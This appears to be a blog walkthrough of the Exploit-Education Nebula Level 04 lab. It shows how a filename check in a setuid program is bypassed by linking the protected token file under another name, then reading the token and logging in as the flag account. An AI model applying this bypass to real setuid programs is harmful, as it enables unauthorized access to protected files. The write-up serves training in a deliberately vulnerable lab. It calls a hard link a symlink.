Exploit-Education Nebula Level 04

less than 1 minute read

Exploit Education Level 4

Challenge

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.

Vulnerabilty

The program looks for the string token in the file name.

if(strstr(argv[1], "token") != NULL) {
      printf("You may not access '%s'\n", argv[1]);
      exit(EXIT_FAILURE);

We can beat this check by creating a symlink to the file token using a file name that does not have token in it

level04@nebula:~$ ln /home/flag04/token /home/level04/flag
level04@nebula:~$ ls
flag  flag04  token

Symlink created. lets run the program now.

level04@nebula:~$ cd /home/flag04
level04@nebula:/home/flag04$ ./flag04 /home/level04/flag
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$ su - flag04
Password:
flag04@nebula:~$ getflag
You have successfully executed getflag on a target account
flag04@nebula:~$

Solved!

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.